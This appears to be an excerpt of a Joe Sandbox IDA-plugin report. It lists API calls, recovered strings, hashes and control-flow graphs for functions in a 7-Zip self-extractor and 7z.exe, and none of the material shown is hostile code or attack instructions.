                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3015594791-0
                                                                                                                                                                • Opcode ID: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
                                                                                                                                                                • Instruction ID: 5f24f27530ec3351cfe61c109b9f8109a002e7470ac3ae9da68eaa6329551e7b
                                                                                                                                                                • Opcode Fuzzy Hash: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
                                                                                                                                                                • Instruction Fuzzy Hash: 23016D35101109EFDF109F55ED48EEA7BA6FF14384B18C53EF845A26A0EB35E850DB19
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                                                                                                                  • Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041A834,0041A83C), ref: 0040445E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041A834,0041A83C), ref: 00404466
                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00404473
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040447E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@TextWindow$Length
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2308334395-0
                                                                                                                                                                • Opcode ID: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
                                                                                                                                                                • Instruction ID: 3481eafec51d8512e57604988f767cc9cc3c1553ab35ab675722db7162792d52
                                                                                                                                                                • Opcode Fuzzy Hash: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
                                                                                                                                                                • Instruction Fuzzy Hash: 31F0FF76D04108BACF05BBA2DD46CDDBB7CEF18348F1040AAF50171091EA799B958B94
                                                                                                                                                                APIs
                                                                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 00408094
                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 004080AA
                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004080BE
                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004080CA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2001801573-0
                                                                                                                                                                • Opcode ID: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
                                                                                                                                                                • Instruction ID: 956e92ef37cd049c126208e7095bac86b33f3b6997e338fc061b002d9265881b
                                                                                                                                                                • Opcode Fuzzy Hash: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
                                                                                                                                                                • Instruction Fuzzy Hash: 00F0BE71501708AFDB215BA4DD09FCBBBACAB88B01F048039FA41E22D0DBB4E4148A29
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(00420B90), ref: 0040B989
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00420B90), ref: 0040B9CC
                                                                                                                                                                  • Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B824
                                                                                                                                                                  • Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT ref: 0040B866
                                                                                                                                                                  • Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT(?,0000001F), ref: 0040B87C
                                                                                                                                                                  • Part of subcall function 0040B7A0: memmove.MSVCRT(00000000,?,?,?,0000001F), ref: 0040B899
                                                                                                                                                                  • Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT(?,?,0000001F), ref: 0040B8A6
                                                                                                                                                                  • Part of subcall function 0040B7A0: memmove.MSVCRT(?,?,?,?,?,0000001F), ref: 0040B8C4
                                                                                                                                                                  • Part of subcall function 0040AEE0: memset.MSVCRT ref: 0040AF4D
                                                                                                                                                                  • Part of subcall function 0040B910: ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B937
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$??3@CriticalSectionmemmove$EnterLeavememset
                                                                                                                                                                • String ID: $A$$A
                                                                                                                                                                • API String ID: 2633840989-464203494
                                                                                                                                                                • Opcode ID: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
                                                                                                                                                                • Instruction ID: 6d2d4446e2632278ac84d03e88f46c99b33c2e18b0b42c59bf91942fc9617b32
                                                                                                                                                                • Opcode Fuzzy Hash: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
                                                                                                                                                                • Instruction Fuzzy Hash: B8E0927431112516892437566C15AFE1B9ACEC5348B00043FF701732C3CFAD299642EE
                                                                                                                                                                APIs
                                                                                                                                                                • GetParent.USER32(?), ref: 00402088
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004020A1
                                                                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 004020AF
                                                                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 004020B6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClientScreen$ParentRectWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099118873-0
                                                                                                                                                                • Opcode ID: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
                                                                                                                                                                • Instruction ID: 302afeb31cedc52bf97cb9c1a24104c68e6dc93ac8c9cb6ce1a7b953da425052
                                                                                                                                                                • Opcode Fuzzy Hash: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
                                                                                                                                                                • Instruction Fuzzy Hash: 3DE086721063216FD7119BB5BC88C8B7FADEFC5A26700447AF64592321C7729C20DA72
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 004083EA: GetSystemMetrics.USER32(00000010), ref: 0040842C
                                                                                                                                                                  • Part of subcall function 004083EA: GetSystemMetrics.USER32(00000011), ref: 0040843A
                                                                                                                                                                • wsprintfW.USER32 ref: 00405364
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,?,00000000,0041B828,?), ref: 004053A1
                                                                                                                                                                Strings
                                                                                                                                                                • %X - %03X - %03X - %03X - %03X, xrefs: 0040535E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MetricsSystem$??3@wsprintf
                                                                                                                                                                • String ID: %X - %03X - %03X - %03X - %03X
                                                                                                                                                                • API String ID: 1174869416-1993364030
                                                                                                                                                                • Opcode ID: 9da405b217e236085c795cf3f54e4910e22096123c54df3e54b31411474b3c7f
                                                                                                                                                                • Instruction ID: 65adf6dcda70838bb3b21e6056e5f535fe41afcbb6b0b1b43c55218142ba6697
                                                                                                                                                                • Opcode Fuzzy Hash: 9da405b217e236085c795cf3f54e4910e22096123c54df3e54b31411474b3c7f
                                                                                                                                                                • Instruction Fuzzy Hash: 7D117231A40218AADB51FB95ED46FDD7338FF14B08F50417AB911361D2DFB86A45CB88
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@wsprintf
                                                                                                                                                                • String ID: (%d%s)
                                                                                                                                                                • API String ID: 3815514257-2087557067
                                                                                                                                                                • Opcode ID: 61444d802996020068455bd4b1035fbf1a094a957ca52f7f25f2d899a103b017
                                                                                                                                                                • Instruction ID: b8a3091fb0a8786d5856ec0415992ba747c3c410e3350e73f686e4d9c7ab3f81
                                                                                                                                                                • Opcode Fuzzy Hash: 61444d802996020068455bd4b1035fbf1a094a957ca52f7f25f2d899a103b017
                                                                                                                                                                • Instruction Fuzzy Hash: E3F06271900218ABCB21B756DD06ECA777CAF00304F1041BBA552B15E2DA75AA54CB98
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                                                                                                                • GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: TextWindow$Length
                                                                                                                                                                • String ID: j4@
                                                                                                                                                                • API String ID: 1006428111-2012685699
                                                                                                                                                                • Opcode ID: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
                                                                                                                                                                • Instruction ID: 3817dcc93708ae326cc9214659a9c4e7fc7be87bb8e982cfdb796d017d3acd91
                                                                                                                                                                • Opcode Fuzzy Hash: a5a5aa5c2199368c0d63f38f78d8696d952a23570f2059af60636447187a34c1
                                                                                                                                                                • Instruction Fuzzy Hash: 89E09239200212AFC2229F19D84486FBBFAEFC4310B00847AF841D33E1CB39DC118B95
                                                                                                                                                                APIs
                                                                                                                                                                • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 0040475C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message
                                                                                                                                                                • String ID: 7-Zip SFX$Could not allocate memory
                                                                                                                                                                • API String ID: 2030045667-3806377612
                                                                                                                                                                • Opcode ID: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
                                                                                                                                                                • Instruction ID: eff6b3f0ce1e45bdfd51bc9acb40b22f926f37b9a8d4657fa527a9dafaf84f3f
                                                                                                                                                                • Opcode Fuzzy Hash: 6e4107068b50d37af6e098bbdeb86df69921fc5b65f8f057bb3becd2315cd132
                                                                                                                                                                • Instruction Fuzzy Hash: 5AB012703C130022E21113200C07FC416408B08F13F10C552B108A80D3CBD900D0205D
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputs
                                                                                                                                                                • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$ $ || $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELH$Libs:$Unsupported archive type$offset=
                                                                                                                                                                • API String ID: 3442115484-272389550
                                                                                                                                                                • Opcode ID: a931e12469d36633656629b368bfb4bc4574337cde60d6b1639cb76b79ae0d71
                                                                                                                                                                • Instruction ID: 50d6c1bcc17cdfa358a50078a79521d6423c1382b77f853ba6e1b005870e9350
                                                                                                                                                                • Opcode Fuzzy Hash: a931e12469d36633656629b368bfb4bc4574337cde60d6b1639cb76b79ae0d71
                                                                                                                                                                • Instruction Fuzzy Hash: 90728B72608A81D6DB64EF25E4943AE7371F788B80F408127DA8E47B69DF3CD859CB41
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3352498445-0
                                                                                                                                                                • Opcode ID: 4e256cbe4a0c1d894e55577dd840348a68d2e9127456a459469f7d4970d028a4
                                                                                                                                                                • Instruction ID: 22876fb161df53465790874f11d157dcf6408af82373b6e22eb5176419c8c759
                                                                                                                                                                • Opcode Fuzzy Hash: 4e256cbe4a0c1d894e55577dd840348a68d2e9127456a459469f7d4970d028a4
                                                                                                                                                                • Instruction Fuzzy Hash: 8C826A32259AC4D6CA20EF25E4947EEB360FB85B90F504126EB8D57B5ADF7CC946CB00

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1635 7b47ac-7b485c call 793314 * 2 1640 7b489a-7b491b call 7b6344 call 7932bc call 793b5c free * 2 call 793208 call 793314 1635->1640 1641 7b485e-7b4884 call 792880 1635->1641 1656 7b49bd-7b49cb call 79477c 1640->1656 1657 7b4921-7b4925 1640->1657 1641->1640 1646 7b4886-7b4895 call 793404 1641->1646 1646->1640 1662 7b4dff 1656->1662 1663 7b49d1-7b49e7 1656->1663 1657->1656 1659 7b492b-7b495e call 793208 call 79449c 1657->1659 1676 7b49b0-7b49b8 free 1659->1676 1677 7b4960-7b496f 1659->1677 1665 7b4e02-7b4e05 1662->1665 1673 7b49e9-7b4a28 free * 4 1663->1673 1674 7b4a68-7b4ad2 call 793208 * 3 1663->1674 1668 7b4e40-7b4e45 1665->1668 1669 7b4e07-7b4e1c call 792130 1665->1669 1671 7b4e5d-7b4e62 call 7970c8 1668->1671 1672 7b4e47-7b4e58 call 793518 1668->1672 1691 7b4e1e-7b4e2e call 793314 1669->1691 1692 7b4e30 1669->1692 1689 7b4e67-7b4e6a 1671->1689 1698 7b4f2c-7b4f98 call 7a3f0c 1672->1698 1681 7b4a2a 1673->1681 1682 7b4a58-7b4a63 free 1673->1682 1719 7b4ad8-7b4adb 1674->1719 1720 7b4d30-7b4d3b 1674->1720 1676->1656 1684 7b497a-7b498b 1677->1684 1685 7b4971-7b4978 1677->1685 1690 7b4a2e-7b4a41 1681->1690 1686 7b504a-7b5059 free 1682->1686 1693 7b4993-7b4996 1684->1693 1685->1684 1685->1693 1696 7b523b-7b524e 1686->1696 1689->1698 1699 7b4e70-7b4eea GetLastError call 793518 call 79362c free * 4 1689->1699 1700 7b4a43-7b4a4f free * 2 1690->1700 1701 7b4a54-7b4a56 1690->1701 1695 7b4e33-7b4e3b call 79b8f0 1691->1695 1692->1695 1693->1676 1694 7b4998-7b49ad call 793404 1693->1694 1694->1676 1695->1668 1714 7b505e-7b5062 1698->1714 1715 7b4f9e-7b4fa2 1698->1715 1729 7b4f1a-7b4f27 free 1699->1729 1730 7b4eec 1699->1730 1700->1701 1701->1682 1701->1690 1717 7b506e 1714->1717 1718 7b5064-7b506c 1714->1718 1715->1714 1721 7b4fa8-7b4fac 1715->1721 1723 7b5071-7b507d 1717->1723 1718->1717 1718->1723 1724 7b4add-7b4ae0 1719->1724 1725 7b4b24-7b4b3e call 7bec5c 1719->1725 1726 7b4d41-7b4dae call 7a2a84 free * 4 1720->1726 1727 7b4df0-7b4dfd call 7a2a84 1720->1727 1721->1714 1728 7b4fb2-7b4fc7 call 7a32e8 1721->1728 1734 7b5083-7b50d1 1723->1734 1735 7b5152-7b516d 1723->1735 1724->1725 1736 7b4ae2-7b4aee 1724->1736 1746 7b4c9d-7b4cee call 7a2a84 free * 4 1725->1746 1747 7b4b44 1725->1747 1792 7b4dde-7b4deb free 1726->1792 1793 7b4db0 1726->1793 1727->1665 1728->1714 1753 7b4fcd-7b500d free * 4 1728->1753 1729->1686 1732 7b4ef0-7b4f03 1730->1732 1739 7b4f15-7b4f18 1732->1739 1740 7b4f05-7b4f10 free * 2 1732->1740 1779 7b5143-7b5150 call 79ae2c 1734->1779 1780 7b50d3-7b50de 1734->1780 1751 7b5173 1735->1751 1742 7b4b4c-7b4b50 1736->1742 1743 7b4af0-7b4af7 1736->1743 1739->1729 1739->1732 1740->1739 1748 7b4b52-7b4b5a 1742->1748 1749 7b4b60-7b4b63 1742->1749 1743->1742 1752 7b4af9-7b4b14 call 7bb290 1743->1752 1775 7b4d1e-7b4d2b free 1746->1775 1776 7b4cf0 1746->1776 1747->1742 1748->1749 1755 7b4bf5-7b4bff 1748->1755 1756 7b4bc1-7b4bc4 1749->1756 1757 7b4b65-7b4b80 call 794318 1749->1757 1758 7b5175-7b517b 1751->1758 1782 7b4c0a-7b4c5b call 7a2a84 free * 4 1752->1782 1783 7b4b1a-7b4b22 1752->1783 1761 7b500f 1753->1761 1762 7b503d-7b5048 free 1753->1762 1755->1719 1766 7b4c05 1755->1766 1763 7b4be3-7b4bf2 call 7dc7d4 1756->1763 1764 7b4bc6-7b4be1 call 7a43fc 1756->1764 1789 7b4b82-7b4b85 1757->1789 1790 7b4b87-7b4b9e 1757->1790 1769 7b517d-7b5188 call 7a6cd0 1758->1769 1770 7b5190-7b519e call 7d1850 1758->1770 1773 7b5013-7b5026 1761->1773 1762->1686 1763->1755 1764->1755 1764->1763 1766->1720 1769->1770 1787 7b51a1-7b51a6 1770->1787 1785 7b5038-7b503b 1773->1785 1786 7b5028-7b5033 free * 2 1773->1786 1775->1686 1788 7b4cf4-7b4d07 1776->1788 1779->1758 1780->1779 1791 7b50e0-7b50e3 1780->1791 1819 7b4c8b-7b4c98 free 1782->1819 1820 7b4c5d 1782->1820 1783->1742 1785->1762 1785->1773 1786->1785 1800 7b51a8-7b51b0 call 7a6cd0 1787->1800 1801 7b51b1-7b51f1 free * 4 1787->1801 1802 7b4d19-7b4d1c 1788->1802 1803 7b4d09-7b4d14 free * 2 1788->1803 1789->1756 1806 7b4baf-7b4bb3 1790->1806 1807 7b4ba0-7b4ba8 1790->1807 1808 7b5138-7b5140 1791->1808 1809 7b50e5-7b50e7 1791->1809 1792->1686 1799 7b4db4-7b4dc7 1793->1799 1817 7b4dd9-7b4ddc 1799->1817 1818 7b4dc9-7b4dd4 free * 2 1799->1818 1800->1801 1811 7b51f3 1801->1811 1812 7b5221-7b5239 free * 2 1801->1812 1802->1775 1802->1788 1803->1802 1806->1756 1814 7b4bb5-7b4bbd 1806->1814 1807->1756 1813 7b4baa-7b4bad 1807->1813 1808->1779 1815 7b512b-7b5136 1809->1815 1816 7b50e9-7b50eb 1809->1816 1824 7b51f7-7b520a 1811->1824 1812->1696 1813->1756 1814->1756 1815->1779 1821 7b511f-7b5129 1816->1821 1822 7b50ed-7b50f0 1816->1822 1817->1792 1817->1799 1818->1817 1819->1686 1825 7b4c61-7b4c74 1820->1825 1821->1779 1828 7b5112-7b511d 1822->1828 1829 7b50f2-7b5111 _CxxThrowException 1822->1829 1826 7b521c-7b521f 1824->1826 1827 7b520c-7b5217 free * 2 1824->1827 1830 7b4c86-7b4c89 1825->1830 1831 7b4c76-7b4c81 free * 2 1825->1831 1826->1812 1826->1824 1827->1826 1828->1779 1829->1828 1830->1819 1830->1825 1831->1830
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • Can not create output directory: , xrefs: 007B4E83
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2746630033.0000000000791000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                                                • Associated: 0000000C.00000002.2746603803.0000000000790000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746673427.00000000007DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746707068.00000000007FC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                • Associated: 0000000C.00000002.2746737266.00000000007FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_790000_7z.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: free$memmove$ErrorExceptionLastThrow
                                                                                                                                                                • String ID: Can not create output directory:
                                                                                                                                                                • API String ID: 4159955631-3123869724
                                                                                                                                                                • Opcode ID: a7dd44774a86cfc31dca2b164596641d1bd2a47cdc46722eeb7db53c0d916d07
                                                                                                                                                                • Instruction ID: acfcc7fc7d39fd30f5993ea00b3725814be3fd3f9ff47cbc84d753b24df8fd6c
                                                                                                                                                                • Opcode Fuzzy Hash: a7dd44774a86cfc31dca2b164596641d1bd2a47cdc46722eeb7db53c0d916d07
                                                                                                                                                                • Instruction Fuzzy Hash: 21425E22259AC4D6CA30EF29E8947EEA361F7C6B80F545112DB8D57B1ADF3CC956CB00

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
